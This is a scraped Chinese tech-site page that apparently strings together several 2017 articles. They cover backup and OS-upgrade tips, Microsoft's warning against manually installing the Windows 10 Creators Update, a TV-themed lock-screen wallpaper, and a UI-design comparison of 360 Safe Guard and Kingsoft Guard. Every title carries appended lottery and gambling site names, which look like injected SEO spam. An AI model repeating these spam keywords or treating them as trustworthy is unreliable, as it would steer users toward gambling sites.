??</p><p>4、尽快(今后定期)备份自己电脑中的重要文件资料到移动硬盘、U盘,备份完后脱机保存该磁盘。</p><p>5、建议仍在使用windows xp, windows 2003操作系统的用户尽快升级到 window 7/windows 10,或 windows 2008/2012/2016操作系统。</p><p>6、安装正版操作系统、Office软件等。</p> [系统安全]win10创意者更新怎么安装 为什么手动安装Win10创意者更新后果严重-啊彩彩票,万博彩票,1分11选5,瑞祥祥云app http://www.pjyuanjian.com//html/150329_1.html 西西小熊 系统安全 2017/4/27 8:27:07 <p><strong>win10创意者</strong>更新怎么安装?为什么手动安装Win10创意者更新后果严重?微软:不要手动安装Win10创意者更新,这是为什么呢?一起来看看来win10创意者更新怎么安装?为什么手动安装Win10创意者更新后果严重?</p><p>对于那些还没有更新Win10.3的用户来说,微软今天在其博客中发出通告,一定不要手动安装创意者更新,而是等待系统自动推送,否则出现的很麻烦的情况。</p><p align="center"><img src="http://img1.mydrivers.com/img/20170427/s_5b46711f168d4aefb10555224e56f55b.jpg"/></p><p>微软John Cable表示,第一阶段创意者更新只推送给一些微软较新的设备,他们希望通过最新的配置来充分运行操作系统,根据反馈消息来决定下一个阶段的推送。</p><p>当然微软并没有强制制止用户手动升级创意者更新,但他们也明确表示了,如果强行升级就要做好面对可能出现一些无法解决之问题的准备,后果很严重。</p><p>John Cable指出,微软会根据对用户的影响程度来决定要阻止的内容。在解决问题的时候,他们希望限制出现该问题的客户数量。比如反馈过程确定了使用特定系列的PC无法完成蓝牙附件连接的问题,一旦确定变将此问题发布到Windows社区论坛,提供用户故障排除指导,并阻止其他设备使用这些特定蓝牙无线电更新。</p><p align="center"><img src="http://img1.mydrivers.com/img/20170427/s_89c89b6fecb7448b887198b1027f8553.png"/></p> [网络安全]达康书记锁屏壁纸分享 达康书记锁屏壁纸高清版原图-啊彩彩票,万博彩票,1分11选5,瑞祥祥云app http://www.pjyuanjian.com//html/145338_1.html 西西 网络安全 2017/4/11 14:26:55 <p>达康书记锁屏壁纸分享,达康书记锁屏壁纸高清版原图。人民的名义正在热播中,背锅侠达康书记火啦,网友还制作了达康书记锁屏壁纸,可以用来时时督促自己,不少小伙伴都在求原图呢,西西小编为大家分享达康书记锁屏壁纸高清版原图。</p><p><strong>达康书记锁屏软件下载:</strong><a href="http://www.pjyuanjian.com/soft/458369.html" _src="http://www.pjyuanjian.com/soft/458369.html"><strong>http://www.pjyuanjian.com/soft/458369.html</strong></a></p><p style="text-align:center;"><img src="https://pic.cr173.com/up/2017-4/201704111452043997861.png"/></p><p style="text-align:center;"><img src="https://pic.cr173.com/up/2017-4/20174111437532058.jpg" alt="达康书记锁屏软件 官方版"/></p><p><span style="color: rgb(255, 0, 0);"><strong>达康书记锁屏壁纸高清版原图</strong></span></p><p style="text-align:center;"><img src="https://pic.cr173.com/up/2017-4/201704111439536313368.png"/></p><p><span style="color: rgb(255, 0, 0);"><strong>达康书记怎么火了</strong></span></p><p>这位巨火的“达康书记”就是当下大热的反腐剧《人民的名义》 中一个角色。</p><p>一开始,观众都以为达康书记“有问题”,他一定就是幕后黑手大boss。可是这几天随着剧情的发展,网友发现达康书记,他其实只是个“耿直boy”,一个刚正不阿、廉洁奉公的好领导!</p><p>达康书记在戏里的处境就是——</p><p>坏人 坏人 坏人 坏人 坏人</p><p>坏人 坏人 坏人 坏人 坏人</p><p>坏人 坏人达康坏人 坏人</p><p>坏人 坏人 坏人 坏人 坏人</p><p>坏人 坏人 坏人 坏人 坏人</p><p>上要帮前任擦屁股,下要对付下属欺瞒,左右提防同僚踩,内里还得小心妻子挖坑。</p><p><strong>网友戏称他为“填坑专业户”、“天生背锅侠”。</strong></p><p>万万没想到,《人民的名义》热播,最先火起来的不是颜值担当陆毅,不是演技爆表的侯勇,而是达康书记。</p> [安全产品]360安全卫士、QQ电脑管家、金山卫士,从功能完整、易用性、安全等角度来说,哪一款电脑管理软件最好?为什么?-啊彩彩票,万博彩票,1分11选5,瑞祥祥云app http://www.pjyuanjian.com//html/132029_1.html 王敏军 安全产品 2017/2/17 19:09:35 <p>360安全卫士、QQ电脑管家、金山卫士,从功能完整、易用性、安全等角度来说,哪一款电脑管理软件最好?为什么?</p><p>又是一年开学了,很多返校的同学们有些可能配了新电,有些可能要重装系统,一般小白用户装好新系统后第一件事就是安装杀毒软件。</p><p>那到底安装哪一款安全软件好呢,西西小编现在找了一些资料来简单介绍一下国内几个常用的免费安全软件哪一个好。</p><p>第一名肯定是 <a href="http://www.pjyuanjian.com/soft/3188.html" target="_self">360安全卫士</a>,国内PC占用现在因该在 60-70%之间;下载地址:<a href="http://www.pjyuanjian.com/soft/3188.html" _src="http://www.pjyuanjian.com/soft/3188.html">http://www.pjyuanjian.com/soft/3188.html</a>&nbsp;</p><p>第二个当然是 腾迅的后起之秀 <a href="http://www.pjyuanjian.com/soft/36664.html" target="_self">QQ电脑管家</a> 下载地址:<a href="http://www.pjyuanjian.com/soft/36664.html" _src="http://www.pjyuanjian.com/soft/36664.html">http://www.pjyuanjian.com/soft/36664.html</a>&nbsp;</p><p>第三个 老版的金出的 <a href="http://www.pjyuanjian.com/soft/8437.html" target="_self">金山卫士</a> ,当然金山我们还可以选择 <a href="http://www.pjyuanjian.com/soft/47908.html" target="_self">金山毒霸</a>&nbsp;</p><p><br/></p><p><img src="https://pic.cr173.com/up/2017-2/14873282126704206.png" title="2017-02-17_184343.png"/></p><p>金山卫士和360安全卫士是两款非常类似的产品,拥有查杀木马,清理插件,修复漏洞,电脑体检等多种功能,旨在为用户使用个人电脑时提供一种安全保障。下面主要就产品的<strong>交互设计</strong>来谈谈两者。</p><p><br/><strong> &nbsp; &nbsp; &nbsp; </strong><strong> </strong><strong>一,导航</strong> &nbsp;<strong> </strong>导航的设计是交互中很重要的环节,良好的导航设计有助于用户准确的完成目标任务。</p><p>1<strong>,</strong><strong>首页上两者的主导航</strong><br/><strong><br/></strong><br/><strong><noscript>&amp;amp;amp;amp;amp;amp;amp;amp;lt;img src=&amp;amp;amp;amp;amp;amp;quot;http://pic.cr173.com/up/2017-2/2017021718441337823.jpg&amp;amp;amp;amp;amp;amp;quot; data-rawwidth=&amp;amp;amp;amp;amp;amp;quot;640&amp;amp;amp;amp;amp;amp;quot; data-rawheight=&amp;amp;amp;amp;amp;amp;quot;81&amp;amp;amp;amp;amp;amp;quot; class=&amp;amp;amp;amp;amp;amp;quot;origin_image zh-lightbox-thumb&amp;amp;amp;amp;amp;amp;quot; width=&amp;amp;amp;amp;amp;amp;quot;640&amp;amp;amp;amp;amp;amp;quot; data-original=&amp;amp;amp;amp;amp;amp;quot;https://pic3.zhimg.com/825a36c49098e185e0f9bff65fe63856_r.jpg&amp;amp;amp;amp;amp;amp;quot;&amp;amp;amp;amp;amp;amp;amp;amp;gt;</noscript><img src="https://pic.cr173.com/up/2017-2/2017021718441337823.jpg" data-rawwidth="640" data-rawheight="81" class="origin_image zh-lightbox-thumb lazy" width="640" data-original="https://pic3.zhimg.com/825a36c49098e185e0f9bff65fe63856_r.jpg" data-actualsrc="http://pic.cr173.com/up/2017-2/2017021718441337823.jpg"/><noscript>&amp;amp;amp;amp;amp;amp;amp;amp;lt;img src=&amp;amp;amp;amp;amp;amp;quot;http://pic.cr173.com/up/2017-2/2017021718441497899.jpg&amp;amp;amp;amp;amp;amp;quot; data-rawwidth=&amp;amp;amp;amp;amp;amp;quot;659&amp;amp;amp;amp;amp;amp;quot; data-rawheight=&amp;amp;amp;amp;amp;amp;quot;107&amp;amp;amp;amp;amp;amp;quot; class=&amp;amp;amp;amp;amp;amp;quot;origin_image zh-lightbox-thumb&amp;amp;amp;amp;amp;amp;quot; width=&amp;amp;amp;amp;amp;amp;quot;659&amp;amp;amp;amp;amp;amp;quot; data-original=&amp;amp;amp;amp;amp;amp;quot;https://pic1.zhimg.com/b265c84392e3a0790a2aaded9dfff608_r.jpg&amp;amp;amp;amp;amp;amp;quot;&amp;amp;amp;amp;amp;amp;amp;amp;gt;</noscript><img src="https://pic.cr173.com/up/2017-2/2017021718441497899.jpg" data-rawwidth="659" data-rawheight="107" class="origin_image zh-lightbox-thumb lazy" width="659" data-original="https://pic1.zhimg.com/b265c84392e3a0790a2aaded9dfff608_r.jpg" data-actualsrc="http://pic.cr173.com/up/2017-2/2017021718441497899.jpg"/></strong><br/>两者首页的主导航(结构导航)相差无几,以最快速的方式让用户了解了整个产品大概有什么功能。唯一的不同点便是金山卫士将<strong>清理插件</strong>和<strong>系统修复</strong>放在了<strong>查杀木马</strong>下的二级导航,作为局部导航用。</p><p><noscript>&amp;amp;amp;amp;amp;amp;amp;amp;lt;img src=&amp;amp;amp;amp;amp;amp;quot;http://pic.cr173.com/up/2017-2/2017021718441424725.jpg&amp;amp;amp;amp;amp;amp;quot; data-rawwidth=&amp;amp;amp;amp;amp;amp;quot;296&amp;amp;amp;amp;amp;amp;quot; data-rawheight=&amp;amp;amp;amp;amp;amp;quot;38&amp;amp;amp;amp;amp;amp;quot; class=&amp;amp;amp;amp;amp;amp;quot;content_image&amp;amp;amp;amp;amp;amp;quot; width=&amp;amp;amp;amp;amp;amp;quot;296&amp;amp;amp;amp;amp;amp;quot;&amp;amp;amp;amp;amp;amp;amp;amp;gt;</noscript><img src="https://pic.cr173.com/up/2017-2/2017021718441424725.jpg" data-rawwidth="296" data-rawheight="38" class="content_image lazy" width="296" data-actualsrc="http://pic.cr173.com/up/2017-2/2017021718441424725.jpg"/><br/></p><p>2<strong>,</strong><strong>垃圾清理页面的局部导航设计</strong></p><p>这是360安全卫士的局部导航设计:<noscript>&amp;amp;amp;amp;amp;amp;amp;amp;lt;img src=&amp;amp;amp;amp;amp;amp;quot;http://pic.cr173.com/up/2017-2/2017021718441430333.jpg&amp;amp;amp;amp;amp;amp;quot; data-rawwidth=&amp;amp;amp;amp;amp;amp;quot;440&amp;amp;amp;amp;amp;amp;quot; data-rawheight=&amp;amp;amp;amp;amp;amp;quot;40&amp;amp;amp;amp;amp;amp;quot; class=&amp;amp;amp;amp;amp;amp;quot;origin_image zh-lightbox-thumb&amp;amp;amp;amp;amp;amp;quot; width=&amp;amp;amp;amp;amp;amp;quot;440&amp;amp;amp;amp;amp;amp;quot; data-original=&amp;amp;amp;amp;amp;amp;quot;https://pic3.zhimg.com/f3ad0d267e99ec94ababe449d81af852_r.jpg&amp;amp;amp;amp;amp;amp;quot;&amp;amp;amp;amp;amp;amp;amp;amp;gt;这是金山卫士的局部导航设计:</noscript><img src="https://pic.cr173.com/up/2017-2/2017021718441430333.jpg" data-rawwidth="440" data-rawheight="40" class="origin_image zh-lightbox-thumb lazy" width="440" data-original="https://pic3.zhimg.com/f3ad0d267e99ec94ababe449d81af852_r.jpg" data-actualsrc="http://pic.cr173.com/up/2017-2/2017021718441430333.jpg"/>这是金山卫士的局部导航设计:<noscript>&amp;amp;amp;amp;amp;amp;amp;amp;lt;img src=&amp;amp;amp;amp;amp;amp;quot;http://pic.cr173.com/up/2017-2/2017021718441435942.jpg&amp;amp;amp;amp;amp;amp;quot; data-rawwidth=&amp;amp;amp;amp;amp;amp;quot;279&amp;amp;amp;amp;amp;amp;quot; data-rawheight=&amp;amp;amp;amp;amp;amp;quot;39&amp;amp;amp;amp;amp;amp;quot; class=&amp;amp;amp;amp;amp;amp;quot;content_image&amp;amp;amp;amp;amp;amp;quot; width=&amp;amp;amp;amp;amp;amp;quot;279&amp;amp;amp;amp;amp;amp;quot;&amp;amp;amp;amp;amp;amp;amp;amp;gt;</noscript><img src="https://pic.cr173.com/up/2017-2/2017021718441435942.jpg" data-rawwidth="279" data-rawheight="39" class="content_image lazy" width="279" data-actualsrc="http://pic.cr173.com/up/2017-2/2017021718441435942.jpg"/><br/></p><p>两者的差别就在于<strong>一键清理</strong>上,360安全卫士在局部导航的设计时增加了一项“<strong>一键清理”,</strong>并且设为默认项,看似没有什么,实际上意义却很大。就像周总说的,在使用产品的时候有大量的三低用户,我们在设计产品的时候必须考虑到他们”对计算机不熟悉,对互联网不了解,只是当一个工具在用“的情况,比如说在垃圾清理页面中,像金山那样直接进入清理垃圾的页面,里面立刻会呈现出一堆什么windows系统产生的垃圾,媒体软件产生的垃圾等等,需要用户自定义的去勾选进行清理,这在一定程度上增加了用户的操作困难度(尤其是对大量三低用户,对基本的互联网概念和操作不知所云,遇到这种情况会觉得很困惑)。而360推出的<strong>一键清理</strong>就解决了这个问题,用户进去垃圾清理清理的页面,呈现在眼前的就是一键清理,<strong>只需一步就能完成,不需要有什么知识背景,简单快速,降低了用户的操作门槛,同时减少交互流程,有效的降低了用户的流失率</strong>。(当然,由于有点互联网知识背景或使用经验的用户更希望去自定义的清理,以避免一键清理带来的误操作)</p><p>3<strong>, &nbsp;</strong><strong>软件管家中的导航设计</strong></p><p>先看看360软件管家的导航设计:<noscript>&amp;amp;amp;amp;amp;amp;amp;amp;lt;img src=&amp;amp;amp;amp;amp;amp;quot;http://pic.cr173.com/up/2017-2/2017021718441441551.jpg&amp;amp;amp;amp;amp;amp;quot; data-rawwidth=&amp;amp;amp;amp;amp;amp;quot;912&amp;amp;amp;amp;amp;amp;quot; data-rawheight=&amp;amp;amp;amp;amp;amp;quot;664&amp;amp;amp;amp;amp;amp;quot; class=&amp;amp;amp;amp;amp;amp;quot;origin_image zh-lightbox-thumb&amp;amp;amp;amp;amp;amp;quot; width=&amp;amp;amp;amp;amp;amp;quot;912&amp;amp;amp;amp;amp;amp;quot; data-original=&amp;amp;amp;amp;amp;amp;quot;https://pic3.zhimg.com/38db1d109010a53fb36baaa8b90ece1a_r.jpg&amp;amp;amp;amp;amp;amp;quot;&amp;amp;amp;amp;amp;amp;amp;amp;gt;</noscript><img src="https://pic.cr173.com/up/2017-2/2017021718441441551.jpg" data-rawwidth="912" data-rawheight="664" class="origin_image zh-lightbox-thumb lazy" width="912" data-original="https://pic3.zhimg.com/38db1d109010a53fb36baaa8b90ece1a_r.jpg" data-actualsrc="http://pic.cr173.com/up/2017-2/2017021718441441551.jpg"/><br/>我们可以看出,360软件管家的面板分为三部分,上面的导航栏,左侧栏和中间的主体部分。我暂且把这三部分称为top,left,和main。top中实际上就是结构导航(也叫全局导航),left中是二级局部导航(旨在为用户提供最方便的快捷操作),main中的上面部分是三级结构导航。这样做的好处就是信息分类明确详细,很好的引导用户进行操作,不好的一面就是导航项太多而导致看起来很混乱,而且交互流程的层级变多,违背了交互中尽量减少交互流程的原则(我们说在交互设计中尽量对流程做减法,多一个流程就会流失一部分用户)。比如我要在软件管家中找华语音乐,那么我得首先在top中找到软件宝库,然后在left中找到音乐,然后在main的上面找到歌手中的华语音乐,如下图所示,这样的交互流程未免太繁琐了。<noscript>&amp;amp;amp;amp;amp;amp;amp;amp;lt;img src=&amp;amp;amp;amp;amp;amp;quot;http://pic.cr173.com/up/2017-2/2017021718441452768.jpg&amp;amp;amp;amp;amp;amp;quot; data-rawwidth=&amp;amp;amp;amp;amp;amp;quot;683&amp;amp;amp;amp;amp;amp;quot; data-rawheight=&amp;amp;amp;amp;amp;amp;quot;419&amp;amp;amp;amp;amp;amp;quot; class=&amp;amp;amp;amp;amp;amp;quot;origin_image zh-lightbox-thumb&amp;amp;amp;amp;amp;amp;quot; width=&amp;amp;amp;amp;amp;amp;quot;683&amp;amp;amp;amp;amp;amp;quot; data-original=&amp;amp;amp;amp;amp;amp;quot;https://pic1.zhimg.com/9378a27be4e01bf08d8127d5892d30b4_r.jpg&amp;amp;amp;amp;amp;amp;quot;&amp;amp;amp;amp;amp;amp;amp;amp;gt;</noscript><img src="https://pic.cr173.com/up/2017-2/2017021718441452768.jpg" data-rawwidth="683" data-rawheight="419" class="origin_image zh-lightbox-thumb lazy" width="683" data-original="https://pic1.zhimg.com/9378a27be4e01bf08d8127d5892d30b4_r.jpg" data-actualsrc="http://pic.cr173.com/up/2017-2/2017021718441452768.jpg"/></p><p><strong>总的来说,360软件管家的导航这样设计的优缺点各有,交互设计实际上就是一种目标导向设计,交互设计的目的就是让用户更加方便简洁迅速的去完成产品目标任务。而在这其中,导航分类详细了难免就会导致导航项过多,交互流程的层级增加,怎样在这两者之间寻找平衡,将是一门很大的学问。</strong></p><p><br/></p><p><strong>与360软件管家相比,金山软件管家的导航设计就相对简单了不少,有图有真相:</strong></p><p><strong><noscript>&amp;amp;amp;amp;amp;amp;amp;amp;lt;img src=&amp;amp;amp;amp;amp;amp;quot;http://pic.cr173.com/up/2017-2/2017021718441421789.jpg&amp;amp;amp;amp;amp;amp;quot; data-rawwidth=&amp;amp;amp;amp;amp;amp;quot;847&amp;amp;amp;amp;amp;amp;quot; data-rawheight=&amp;amp;amp;amp;amp;amp;quot;595&amp;amp;amp;amp;amp;amp;quot; class=&amp;amp;amp;amp;amp;amp;quot;origin_image zh-lightbox-thumb&amp;amp;amp;amp;amp;amp;quot; width=&amp;amp;amp;amp;amp;amp;quot;847&amp;amp;amp;amp;amp;amp;quot; data-original=&amp;amp;amp;amp;amp;amp;quot;https://pic2.zhimg.com/bd1b854c37d472efa865b97ee3af149d_r.jpg&amp;amp;amp;amp;amp;amp;quot;&amp;amp;amp;amp;amp;amp;amp;amp;gt;</noscript><img src="https://pic.cr173.com/up/2017-2/2017021718441421789.jpg" data-rawwidth="847" data-rawheight="595" class="origin_image zh-lightbox-thumb lazy" width="847" data-original="https://pic2.zhimg.com/bd1b854c37d472efa865b97ee3af149d_r.jpg" data-actualsrc="http://pic.cr173.com/up/2017-2/2017021718441421789.jpg"/></strong><br/><strong>全局导航导航项只有四项,局部导航也很简单,虽然没有360那样分类详细,可是简单大方,便于操作。</strong></p><p><strong>对比360软件管家和金山软件管家的导航设计可以看出,前者更注重分类的详细程度,导航项的精准以及覆盖范围的广度,后者则更注重简洁大方以及交互的可操作性。到底是哪个正确,这就得看用户到底更希望哪种需求以及不同产品之间的差异化(比如说360的软件数量要多于金山,可能就造就了它更需要分类详细)了。</strong></p><p><br/><strong> &nbsp; &nbsp; &nbsp; </strong><strong>二</strong><strong>,交互设计中行为召唤的运用。</strong> &nbsp;行为召唤是一种用户引导的方法,所谓行为召唤,实际上就是呈现界面的时候,考虑到用户的心理,激发起用户的参与度。我姑且把行为召唤的方法细分为:用户情感召唤,颜色召唤,图形召唤等,下面就两款产品在行为召唤上的运用做详细分析。<br/><strong><br/></strong> &nbsp; &nbsp;360安全卫士中行为召唤的运用:<noscript>&amp;amp;amp;amp;amp;amp;amp;amp;lt;img src=&amp;amp;amp;amp;amp;amp;quot;http://pic.cr173.com/up/2017-2/2017021718441444223.jpg&amp;amp;amp;amp;amp;amp;quot; data-rawwidth=&amp;amp;amp;amp;amp;amp;quot;741&amp;amp;amp;amp;amp;amp;quot; data-rawheight=&amp;amp;amp;amp;amp;amp;quot;449&amp;amp;amp;amp;amp;amp;quot; class=&amp;amp;amp;amp;amp;amp;quot;origin_image zh-lightbox-thumb&amp;amp;amp;amp;amp;amp;quot; width=&amp;amp;amp;amp;amp;amp;quot;741&amp;amp;amp;amp;amp;amp;quot; data-original=&amp;amp;amp;amp;amp;amp;quot;https://pic3.zhimg.com/bfeec81c176bfe4a3ede2114900204b6_r.jpg&amp;amp;amp;amp;amp;amp;quot;&amp;amp;amp;amp;amp;amp;amp;amp;gt;</noscript><img src="https://pic.cr173.com/up/2017-2/2017021718441444223.jpg" data-rawwidth="741" data-rawheight="449" class="origin_image zh-lightbox-thumb lazy" width="741" data-original="https://pic3.zhimg.com/bfeec81c176bfe4a3ede2114900204b6_r.jpg" data-actualsrc="http://pic.cr173.com/up/2017-2/2017021718441444223.jpg"/><br/><noscript>&amp;amp;amp;amp;amp;amp;amp;amp;lt;img src=&amp;amp;amp;amp;amp;amp;quot;http://pic.cr173.com/up/2017-2/2017021718441431538.jpg&amp;amp;amp;amp;amp;amp;quot; data-rawwidth=&amp;amp;amp;amp;amp;amp;quot;677&amp;amp;amp;amp;amp;amp;quot; data-rawheight=&amp;amp;amp;amp;amp;amp;quot;214&amp;amp;amp;amp;amp;amp;quot; class=&amp;amp;amp;amp;amp;amp;quot;origin_image zh-lightbox-thumb&amp;amp;amp;amp;amp;amp;quot; width=&amp;amp;amp;amp;amp;amp;quot;677&amp;amp;amp;amp;amp;amp;quot; data-original=&amp;amp;amp;amp;amp;amp;quot;https://pic1.zhimg.com/1c1450240679017be4b5ed3fab84b784_r.jpg&amp;amp;amp;amp;amp;amp;quot;&amp;amp;amp;amp;amp;amp;amp;amp;gt;</noscript><img src="https://pic.cr173.com/up/2017-2/2017021718441431538.jpg" data-rawwidth="677" data-rawheight="214" class="origin_image zh-lightbox-thumb lazy" width="677" data-original="https://pic1.zhimg.com/1c1450240679017be4b5ed3fab84b784_r.jpg" data-actualsrc="http://pic.cr173.com/up/2017-2/2017021718441431538.jpg"/><br/><noscript>&amp;amp;amp;amp;amp;amp;amp;amp;lt;img src=&amp;amp;amp;amp;amp;amp;quot;http://pic.cr173.com/up/2017-2/2017021718441461049.jpg&amp;amp;amp;amp;amp;amp;quot; data-rawwidth=&amp;amp;amp;amp;amp;amp;quot;596&amp;amp;amp;amp;amp;amp;quot; data-rawheight=&amp;amp;amp;amp;amp;amp;quot;376&amp;amp;amp;amp;amp;amp;quot; class=&amp;amp;amp;amp;amp;amp;quot;origin_image zh-lightbox-thumb&amp;amp;amp;amp;amp;amp;quot; width=&amp;amp;amp;amp;amp;amp;quot;596&amp;amp;amp;amp;amp;amp;quot; data-original=&amp;amp;amp;amp;amp;amp;quot;https://pic2.zhimg.com/53d3954d6e417984093e02b0f9eab665_r.jpg&amp;amp;amp;amp;amp;amp;quot;&amp;amp;amp;amp;amp;amp;amp;amp;gt;以上可以看出,360的产品在设计时很多地方运用到了行为召唤的方法,很过时候是同时用到</noscript><img src="https://pic.cr173.com/up/2017-2/2017021718441461049.jpg" data-rawwidth="596" data-rawheight="376" class="origin_image zh-lightbox-thumb lazy" width="596" data-original="https://pic2.zhimg.com/53d3954d6e417984093e02b0f9eab665_r.jpg" data-actualsrc="http://pic.cr173.com/up/2017-2/2017021718441461049.jpg"/></p><p>以上可以看出,360的产品在设计时很多地方运用到了行为召唤的方法,很过时候是同时用到<strong>用户情感召唤,颜色召唤,图形召唤</strong>的几种,起到了很好的效果。</p><p><strong>相对来讲,金山卫士中行为召唤的运用没有360那么突出,但也有亮点。</strong><br/>查杀木马的时候有三种方式,快速扫描,全盘扫描和自定义扫描,金山卫士和360安全卫士都是推荐使用快速方式,但<strong>方式不同</strong>,如下图<strong>:</strong></p><p>360安全卫士:<noscript>&amp;amp;amp;amp;amp;amp;amp;amp;lt;img src=&amp;amp;amp;amp;amp;amp;quot;http://pic.cr173.com/up/2017-2/2017021718441496168.jpg&amp;amp;amp;amp;amp;amp;quot; data-rawwidth=&amp;amp;amp;amp;amp;amp;quot;570&amp;amp;amp;amp;amp;amp;quot; data-rawheight=&amp;amp;amp;amp;amp;amp;quot;201&amp;amp;amp;amp;amp;amp;quot; class=&amp;amp;amp;amp;amp;amp;quot;origin_image zh-lightbox-thumb&amp;amp;amp;amp;amp;amp;quot; width=&amp;amp;amp;amp;amp;amp;quot;570&amp;amp;amp;amp;amp;amp;quot; data-original=&amp;amp;amp;amp;amp;amp;quot;https://pic1.zhimg.com/7c71dd129f25c4157565c4bfe3837178_r.jpg&amp;amp;amp;amp;amp;amp;quot;&amp;amp;amp;amp;amp;amp;amp;amp;gt;</noscript><img src="https://pic.cr173.com/up/2017-2/2017021718441496168.jpg" data-rawwidth="570" data-rawheight="201" class="origin_image zh-lightbox-thumb lazy" width="570" data-original="https://pic1.zhimg.com/7c71dd129f25c4157565c4bfe3837178_r.jpg" data-actualsrc="http://pic.cr173.com/up/2017-2/2017021718441496168.jpg"/><br/>金山卫士:<br/><noscript>&amp;amp;amp;amp;amp;amp;amp;amp;lt;img src=&amp;amp;amp;amp;amp;amp;quot;http://pic.cr173.com/up/2017-2/2017021718441411776.jpg&amp;amp;amp;amp;amp;amp;quot; data-rawwidth=&amp;amp;amp;amp;amp;amp;quot;478&amp;amp;amp;amp;amp;amp;quot; data-rawheight=&amp;amp;amp;amp;amp;amp;quot;255&amp;amp;amp;amp;amp;amp;quot; class=&amp;amp;amp;amp;amp;amp;quot;origin_image zh-lightbox-thumb&amp;amp;amp;amp;amp;amp;quot; width=&amp;amp;amp;amp;amp;amp;quot;478&amp;amp;amp;amp;amp;amp;quot; data-original=&amp;amp;amp;amp;amp;amp;quot;https://pic1.zhimg.com/78d6a0d74172b767cfe77b47c65b6bec_r.jpg&amp;amp;amp;amp;amp;amp;quot;&amp;amp;amp;amp;amp;amp;amp;amp;gt;</noscript><img src="https://pic.cr173.com/up/2017-2/2017021718441411776.jpg" data-rawwidth="478" data-rawheight="255" class="origin_image zh-lightbox-thumb lazy" width="478" data-original="https://pic1.zhimg.com/78d6a0d74172b767cfe77b47c65b6bec_r.jpg" data-actualsrc="http://pic.cr173.com/up/2017-2/2017021718441411776.jpg"/><br/></p><p><strong>360</strong><strong>安全卫士的三种方式平行排列,然后在快速扫描上加推荐二字,而金山卫士则是用更大的图形,文字,加粗的边框和字体以及占据视觉热区(一个界面的中间和上方都属于热区)来表达”推荐“二字的意思,比文字来的更加直观,表现更有力度。(运用了图形召唤,颜色召唤等)</strong><br/><strong><br/></strong><br/><strong> &nbsp; &nbsp; &nbsp; &nbsp;三</strong><strong>,复选框的运用。 &nbsp; </strong>在交互设计中,有时候有效地利用复选框能够提供良好的用户体验。</p><p><strong> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;</strong><strong>1 清理插件中复选框的运用</strong></p><p>360安全卫士中:<noscript>&amp;amp;amp;amp;amp;amp;amp;amp;lt;img src=&amp;amp;amp;amp;amp;amp;quot;http://pic.cr173.com/up/2017-2/2017021718441483483.jpg&amp;amp;amp;amp;amp;amp;quot; data-rawwidth=&amp;amp;amp;amp;amp;amp;quot;848&amp;amp;amp;amp;amp;amp;quot; data-rawheight=&amp;amp;amp;amp;amp;amp;quot;209&amp;amp;amp;amp;amp;amp;quot; class=&amp;amp;amp;amp;amp;amp;quot;origin_image zh-lightbox-thumb&amp;amp;amp;amp;amp;amp;quot; width=&amp;amp;amp;amp;amp;amp;quot;848&amp;amp;amp;amp;amp;amp;quot; data-original=&amp;amp;amp;amp;amp;amp;quot;https://pic4.zhimg.com/980626c92fdbae15b7d73cb98c37261b_r.jpg&amp;amp;amp;amp;amp;amp;quot;&amp;amp;amp;amp;amp;amp;amp;amp;gt;金山卫士中:</noscript><img src="https://pic.cr173.com/up/2017-2/2017021718441483483.jpg" data-rawwidth="848" data-rawheight="209" class="origin_image zh-lightbox-thumb lazy" width="848" data-original="https://pic4.zhimg.com/980626c92fdbae15b7d73cb98c37261b_r.jpg" data-actualsrc="http://pic.cr173.com/up/2017-2/2017021718441483483.jpg"/>金山卫士中:<noscript>&amp;amp;amp;amp;amp;amp;amp;amp;lt;img src=&amp;amp;amp;amp;amp;amp;quot;http://pic.cr173.com/up/2017-2/2017021718441476406.jpg&amp;amp;amp;amp;amp;amp;quot; data-rawwidth=&amp;amp;amp;amp;amp;amp;quot;836&amp;amp;amp;amp;amp;amp;quot; data-rawheight=&amp;amp;amp;amp;amp;amp;quot;279&amp;amp;amp;amp;amp;amp;quot; class=&amp;amp;amp;amp;amp;amp;quot;origin_image zh-lightbox-thumb&amp;amp;amp;amp;amp;amp;quot; width=&amp;amp;amp;amp;amp;amp;quot;836&amp;amp;amp;amp;amp;amp;quot; data-original=&amp;amp;amp;amp;amp;amp;quot;https://pic1.zhimg.com/83f4102078ad8e99ad5632ca0ae73e48_r.jpg&amp;amp;amp;amp;amp;amp;quot;&amp;amp;amp;amp;amp;amp;amp;amp;gt;</noscript><img src="https://pic.cr173.com/up/2017-2/2017021718441476406.jpg" data-rawwidth="836" data-rawheight="279" class="origin_image zh-lightbox-thumb lazy" width="836" data-original="https://pic1.zhimg.com/83f4102078ad8e99ad5632ca0ae73e48_r.jpg" data-actualsrc="http://pic.cr173.com/up/2017-2/2017021718441476406.jpg"/><br/></p><p><strong>以上可以看出,360产品的建议清理的复选框是选中的,这样用户不需要什么操作只要点击立即清理就能基本完成他们清理插件的任务,减少用户操作流程,降低用户操作门槛,提供了良好的用户体验,而金山这点做的相对较差。</strong></p><p><strong> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; </strong><strong>2,</strong><strong>垃圾清理时复选框的运用</strong></p><p>360安全卫士中的:<noscript>&amp;amp;amp;amp;amp;amp;amp;amp;lt;img src=&amp;amp;amp;amp;amp;amp;quot;http://pic.cr173.com/up/2017-2/2017021718441482015.jpg&amp;amp;amp;amp;amp;amp;quot; data-rawwidth=&amp;amp;amp;amp;amp;amp;quot;418&amp;amp;amp;amp;amp;amp;quot; data-rawheight=&amp;amp;amp;amp;amp;amp;quot;159&amp;amp;amp;amp;amp;amp;quot; class=&amp;amp;amp;amp;amp;amp;quot;content_image&amp;amp;amp;amp;amp;amp;quot; width=&amp;amp;amp;amp;amp;amp;quot;418&amp;amp;amp;amp;amp;amp;quot;&amp;amp;amp;amp;amp;amp;amp;amp;gt;金山卫士中的:</noscript><img src="https://pic.cr173.com/up/2017-2/2017021718441482015.jpg" data-rawwidth="418" data-rawheight="159" class="content_image lazy" width="418" data-actualsrc="http://pic.cr173.com/up/2017-2/2017021718441482015.jpg"/>金山卫士中的:<noscript>&amp;amp;amp;amp;amp;amp;amp;amp;lt;img src=&amp;amp;amp;amp;amp;amp;quot;http://pic.cr173.com/up/2017-2/2017021718441451036.jpg&amp;amp;amp;amp;amp;amp;quot; data-rawwidth=&amp;amp;amp;amp;amp;amp;quot;471&amp;amp;amp;amp;amp;amp;quot; data-rawheight=&amp;amp;amp;amp;amp;amp;quot;185&amp;amp;amp;amp;amp;amp;quot; 